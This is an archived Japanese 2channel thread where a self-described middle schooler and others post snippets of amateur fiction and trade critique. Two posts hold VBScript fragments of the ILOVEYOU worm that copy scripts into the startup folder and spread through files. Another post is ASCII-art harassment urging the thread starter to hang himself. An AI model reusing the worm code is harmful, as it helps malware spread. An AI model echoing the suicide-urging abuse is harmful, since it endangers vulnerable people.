5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

中学生の俺が小説を書き綴るスレ

1 :壁の緒 ◆4RM1fB0.lc :04/09/13 23:08:44
何が悪い

2 :ヤン:04/09/13 23:15:00
ヤン

3 :壁に耳あり、障子にメアリーさん:04/09/13 23:15:44
がんがれ

4 :壁に耳あり、障子にメアリーさん:04/09/14 01:45:17
ちぇっく。

5 :壁に耳あり、障子にメアリーさん:04/09/14 20:12:17
長編期待。

6 :壁に耳あり、障子にメアリーさん:04/09/15 10:13:43
現在推定読者4〜8名ほど

7 :壁に耳あり、障子にメアリーさん:04/09/15 18:07:37
はよかいてやー待ってんねやしー

8 :壁に耳あり、障子にメアリーさん:04/09/17 00:13:14
早く書かなきゃ高校受験、失敗しますよ!

9 :壁に耳あり、障子にメアリーさん:04/09/17 14:31:13
窓際の席で、むわっとした風が吹き込む中、俺はぼんやりと校庭を眺めていた。
無意識のうちに「彼女」を目で追っている。
3、4組女子合同で体育中の校庭は、彼女の回りだけ色がついているようだった。
彼女の声はよく通る。
「ボールちょうだーい」と、手を上げて言う彼女の声を聞いて俺は口元を緩めた。
身長165センチ、誕生日は3月3日のひな祭り、一人っ子で、好きな食べ物はカレー。
親友は4組の田村で、今はまってる事はインターネット。
・・・彼氏はまだなし。
俺の知ってるのはこのくらい。

10 :壁に耳あり、障子にメアリーさん:04/09/17 22:41:06
進学校であるこの高校に、エスカレータではなく入試で入った俺は、入学当初からこの学校に馴染めないでいた。
全校生徒が千人近くいる内の、外部入学者は3割に満たない。
つまりクラスで外部の人間ってのは5人とかその位なわけで・・・。
別に嫌われていたわけじゃなく、クラスの奴らは馴れ馴れしい程にしゃべりかけてきたし・・・
でも逆に「俺達仲間なんだ!お前も入って来いよ〜!!」と言うテンションについて行けなかった。
なんとなく外部者のそう言う気持ちを理解してくれる他の外部者がいればよかったんだけど
これが見事なまでに、俺のクラスで外部ってのが皆女子。
疎外感を覚えて当然で、その頃はよくなんでこんな学校に入っちゃったんだろうと後悔していた。
学校へ通う事が、日に日に憂鬱になっていった・・・あれは4月の終り。
ゴールデンウィークの丸一日を使って行うという球技大会に向けてのHRの事だった。

11 :壁に耳あり、障子にメアリーさん:04/09/17 22:51:20
「藤谷って、中学の時に野球やってたんだって?じゃあ、出る競技はソフトボールな!!頼むゼ経験者!」
3年間ベンチだったけどな。
てかどこから嗅ぎ付けてきたんだ、その情報。
藤谷って言うのは俺の名前。藤谷 英二(ふじたに えいじ)。長男でも英二。なんか他の字はなかったのか、オヤジ。
勝手に出場競技を決められてしまった俺が反論する間もなく、HRは進行されていった。
「じゃあ、各自、出る競技の集合場所に移動してください」
総務(学級委員の事をこう呼ぶらしい)の奴が指事を出したので、俺はのろのろと立ち上がる。
「行こうゼ藤谷!」
さっき、勝手に俺の競技を決めたこいつは新城 章(しんじょう あきら)。後に俺の友達になる奴だ。
新城は俺の背中を叩いて、ソフトボール出場者の集合場所である視聴覚教室へと先導し始めた。

12 :壁に耳あり、障子にメアリーさん:04/09/17 23:08:01
この球技大会は男女混合チームで行われるもので、視聴覚教室には他クラスの女子も居て。
5組男子の俺は、4組女子の横に座る事になった。
視聴覚教室では、簡単なルールや勝ち抜きトーナメントの方式を説明していたが
3年間補欠とは言え、軟式野球をやっていた俺に聞く必要があるわけがなく、ぼんやりしていた。
その隣で同じようにぼんやりしていたのが彼女だった。
いや、彼女はもっと酷かった。
机に肘をついて、握った拳で頭を支えながらすやすやと眠っている。
少し長めのショートカットが頬にかかって、顔はよく見えなかったが、小さめの鼻と長いまつげが印象的だった。
皆が目を見張る程の美人と言うわけじゃない。
どちらかと言うとボーイッシュな感じで、男との間に友情が芽生えてしまいそうな雰囲気でもある。
でも、なぜか俺は気持ち良さそうに眠る彼女が何故か気になった。

13 :壁に耳あり、障子にメアリーさん:04/09/18 00:52:21
お?始まってるじゃん!
てことで期待hage

14 :壁に耳あり、障子にメアリーさん:04/09/18 21:11:44


15 :壁に耳あり、障子にメアリーさん:04/09/18 22:33:15
13
お前だけ勝手にはげてろ!!氏ね!!

16 :壁に耳あり、障子にメアリーさん:04/09/18 23:43:13
(´∀`)っ まあ、落ち着いて続きを待ちましょうや

17 :たしか今初段 ◆iIqeepKh9g :04/09/19 06:21:28
>>著者
文筆業をかじった(なめた程度)の俺から言わしてもらうと
小説になってないよ。
添削、批評など欲しかったら、レスちょ
自己マンだったらすまん、「中学」だしね。
やる気は大事。
あくまで素人に毛が生えた人より。

18 :キタ━━(・∀・)━━!! ◆kitaQj9oXE :04/09/19 10:42:19
素人に毛が生えたとはどういうことだ?

19 :壁に耳あり、障子にメアリーさん:04/09/19 14:00:49
ジュニア小説ってこんなんだと思うけど・・・?

20 :たしか今初段 ◆iIqeepKh9g :04/09/19 22:33:52
なかなか落ちないんだね、壁は。

風景・人物描写は抽象的で擬音語・擬態語が多く、絵が見えない。
対照的にキャラ設定(名前,身長,趣味)が具体的すぎる。知る必要ない。
主人公が喋っていない。主観的=自己中心的

一言で言うと妄想日記。

21 :壁に耳あり、障子にメアリーさん:04/09/19 22:42:30
3ヶ月は落ちませんよ。

22 :壁に耳あり、障子にメアリーさん:04/09/19 23:27:54
>>20
うーん、ある程度の量を書いた段階での評価・添削ならいいが、
この段階であんまりきついこと言うと、そもそも書く気力を失わせかねないと思うのだが。
書き手に対する批評の意義というのは分かるが、もすこし先を見てからでもいいのでは?
っつーか、ぼかぁもう少し先を読んでみたいぞ。

23 :たしか今初段 ◆iIqeepKh9g :04/09/19 23:46:09
sageた方が良いのか。
もう2日も小説の更新?ないから、終了かな、と。
週刊なのかな?
俺も読んでみたいぞ。
小説が半年くらい続いて、著者に成長が見えて、俺の涙でキーボードが壊れたら感無量。
リアル出版されたら帯は俺が書く。

24 :壁に耳あり、障子にメアリーさん:04/09/19 23:49:20
多分二度と帰ってこないと思うよ。

25 :壁に耳あり、障子にメアリーさん:04/09/20 06:36:35
たしか今初段さんが、どんな小説を読むいくつの方かわからないですが
中高生のジュニア小説を読んでる私達からすれば
そんなに違和感は感じません。
小説っていっても、大人のおじさんやおばさんが読むような
こむずかしい小説もあれば、こんな感じの小説もあると思います。
ひとえに小説って自分の中ではこんなんだーって
ジャンルをくくってかかってるような書き方では
私は初段さんの意見を素直にそうなんだ、とは思えないです。
むしろ、人物描写は多い方がイメージがわきやすくていいです。
主人公がしゃべっていないっていうのは
話を勧めてるのが主人公だから、ありかなーと思います。
私ももう少し先を読んでみたいです。
それと一緒に
是非初段さんが書いた、初段さんの言う小説っていうのが
どんなものか読んでみたいです。
書いてくれませんか?
きっと好みは別れると思いますけど。

26 :壁に耳あり、障子にメアリーさん:04/09/20 16:03:02
('A`)

27 :壁に耳あり、障子にメアリーさん:04/09/20 16:14:27
(・∀・)

28 :壁に耳あり、障子にメアリーさん:04/09/20 18:11:38
>>25

29 :壁に耳あり、障子にメアリーさん:04/09/20 19:36:56
(´・ω・`) vs (`・ω・´)

30 :キタ━━(・∀・)━━!! ◆kitaQj9oXE :04/09/20 20:22:45
(・∀・)vs('A`)

31 :壁に耳あり、障子にメアリーさん:04/09/20 21:16:25
(゚Д゚≡゚Д゚)エッナニナニ?
誰と誰が戦うの?

32 :壁に耳あり、障子にメアリーさん:04/09/22 16:51:02
ところでたしか今初段は帰ってこないな(・∀・)ニヤニヤ

33 :壁に耳あり、障子にメアリーさん:04/09/22 18:33:33
>26になって呆(ry

34 :壁に耳あり、障子にメアリーさん:04/09/24 13:19:11
私も中学生だから参加できるね
女だから俺じゃないけどね
文章でも書いてみるか、創作文芸版によく行くし

35 :アセロラ ◆AvUWrk07Ws :04/09/24 13:22:08
トリップつけてみる。34=アセロラ。
ところで壁をliveからみるにはどうしたらいいんだろうか

36 :壁に耳あり、障子にメアリーさん:04/09/24 14:08:50
設定ファイル弄る

37 :たしか今初段 ◆iIqeepKh9g :04/09/24 17:48:29
('A`)

38 :壁に耳あり、障子にメアリーさん:04/09/25 00:07:39
誰でもいいから書いてやー
楽しみにしてんねんしー('A`)

39 :壁に耳あり、障子にメアリーさん:04/09/25 01:50:44
>>37 軽めのショートショートキボンヌ

40 :壁に耳あり、障子にメアリーさん:04/09/25 21:40:32
('A`)

41 :壁に耳あり、障子にメアリーさん:04/09/26 10:41:15
>>40 ハードなスペースオペラキボンヌ

42 :壁の緒 ◆4RM1fB0.lc :04/09/26 17:29:23
(VーV)そろそろ始めるか
――――――――――――――――――――
 あれは何の音だったろうか。大きな金属音
であったことは記憶しているが、その音がい
かなる要因によるものであったかどうしても
思い出せない。
 音は断続的に私の頭の中で鳴り響いていた。
その都度私は、乾燥に似た虚無を感じるのであっ
た。
(この感情を私自身は逃げだと感じている。こ
の感情によって、世の中と自分の醜悪な部分か
ら目を逸らしてきたように思われるのだ)

43 :壁に耳あり、障子にメアリーさん:04/09/26 19:21:25
あれっ壁の緒って中学生だったのか_| ̄|○イマキガツイタ

44 :壁に耳あり、障子にメアリーさん:04/09/26 19:22:17
ってことは>>9は誰だったんだ(;´∀`)?

45 :たしか今初段 ◆iIqeepKh9g :04/09/26 19:44:21
4-06-184892-5

46 :壁に耳あり、障子にメアリーさん:04/09/26 21:15:28
つまりN3で書くとこういうことか?

[ dc:identifier "4-06-184892-5" ; foaf:maker [ foaf:nick "たしか今初段" ] . ] .

47 :壁に耳あり、障子にメアリーさん:04/09/26 22:36:11
中学生でちゃねらーというのがす凄まじいな。

48 :壁に耳あり、障子にメアリーさん:04/09/26 22:45:52
小学生ですら…の時代ですからな。

49 :壁の緒 ◆4RM1fB0.lc :04/09/27 20:48:42
(VーV)続きどす
――――――――――――――――――――
 その頃の私は、信仰というものに一抹の憧
れを抱いていたことを記憶している。よく図
書館の片隅で、聖書やコーランの訳本などを
読み漁っていた。
 しかしそれらを私のアイデンティーティー
とするには至らなかった。
 またしも聞こえてきたのである、あの音が。
嗚呼、この音は私をどこにも帰属させてはく
れないのか!
 私は暗澹たる心持ちのまま図書館を後にし
た。
 窓外の紅葉は、私にとって皮肉なほど甘美
に思われた。

50 :VALUE0@どらんく ◆VaLUEs80Ag :04/09/28 00:31:56
面白い!

51 :たしか今初段 ◆iIqeepKh9g :04/09/30 08:31:58
面白い!

52 :壁に耳あり、障子にメアリーさん:04/09/30 17:10:49
面白い!

53 :壁に耳あり、障子にメアリーさん:04/10/03 00:08:13
面白い!   のか? まだ物語が始まっていないような気が……。

54 :壁に耳あり、障子にメアリーさん:04/10/03 04:50:54
>>53に同意・・・
この程度で面白いって言える>>50->>52はオメデテーナ('A`)

55 :壁に耳あり、障子にメアリーさん:04/10/04 00:23:31
流れ嫁よ

56 :壁に耳あり、障子にメアリーさん:04/10/04 01:07:30
流れも何もねぇだろ

57 :たしか今初段 ◆iIqeepKh9g :04/10/13 20:20:32
こんにちは
誰か居ますか?

58 :壁に耳あり、障子にメアリーさん:04/10/13 23:41:29
張り付いてます

59 :たしか今初段 ◆iIqeepKh9g :04/10/14 00:26:23
>>58
どういう意味?

60 :壁に耳あり、障子にメアリーさん:04/10/14 20:03:18
だれか2chクトゥルフ物書いて

61 :たしか今初段 ◆iIqeepKh9g :04/10/14 20:28:02
クトゥルフって何?

62 :壁に耳あり、障子にメアリーさん:04/10/19 18:27:12
>>61
>>56

63 :壁に耳あり、障子にメアリーさん:04/10/22 14:58:39
最初のやつの続きが読みたい(ノД`)

64 :たしか今初段 ◆iIqeepKh9g :04/11/05 18:25:06



65 :壁に耳あり、障子にメアリーさん:04/11/05 21:38:19
>>24

66 :壁に耳あり、障子にメアリーさん:04/11/06 01:42:58
誰か小説キボンヌ。

67 :壁に耳あり、障子にメアリーさん:04/11/07 08:49:00
えろか?

68 :壁に耳あり、障子にメアリーさん:04/11/07 22:25:45
こうなったら何でも良し!

69 :たしか今初段 ◆iIqeepKh9g :04/11/11 07:11:59
#79

70 :壁に耳あり、障子にメアリーさん:04/11/12 16:44:37
かぜや、起きなさいかぜ・・・
今日はあなたが北海道旅行に行くとても大切な日
この日のためにあなたを育ててきたのですよ・・・

まだ朝だというのに蒸し暑い部屋の温度と、うざったい母の声で
強制的に起こされるかぜ。
そうだった、今日は家族で札幌のおじいちゃんの家に
旅行に行く日だったんだ。
手早く朝食(コーンフレーク)を済ませると、父に呼ばれた。
「かぜよ、お前ももう16になった。男として節目の年齢だ。
 そこで、私はあえてお前に試練を与える。今回の旅行、
 現地に着いたらお前だけ別行動をとってもらう。ここに
 その資金として50ゴールド(=40000円)用意した、
 向こうで何があろうとも、決して親を頼らずに過ごせ」

こうしてかぜは、不安と期待に胸を膨らませ、午前10時03分
羽田発千歳行きの気球に乗り込んだのであった。


71 :さげ:04/11/15 04:15:12
さげ

72 :壁に耳あり、障子にメアリーさん:04/11/15 06:24:53
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

73 :壁に耳あり、障子にメアリーさん:04/11/15 06:27:47
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")


<  => <
>  => >
&  => &
"  => "




74 :壁に耳あり、障子にメアリーさん:04/11/22 10:32:13
       / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
Λ_Λ  | 君さぁ こんなスレッド立てるから          |
( ´∀`)< 厨房って言われちゃうんだよ             |
( ΛΛ つ >―――――――――――――――――――‐<
 ( ゚Д゚) < おまえのことを必要としてる奴なんて         |
 /つつ  | いないんだからさっさと回線切って首吊れ     |
       \____________________/

■■□■■どうせならこのスレッドに書き込め■■□■■
――――――――――該当なし――――――――――

(-_-) ハヤクシンデネ…
(∩∩)



75 :壁に耳あり、障子にメアリーさん:05/01/16 20:53:09
                                        

76 :壁に耳あり、障子にメアリーさん:2005/04/25(月) 23:55:03
このスレの関連ページ開いたら、ウイルス警告出たよ?

77 :壁に耳あり、障子にメアリーさん:2005/04/26(火) 01:28:07
関連ページ?

78 :壁に耳あり、障子にメアリーさん:2005/05/11(水) 03:30:26
>>3


79 :壁に耳あり、障子にメアリーさん:2005/07/10(日) 07:19:36


15 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)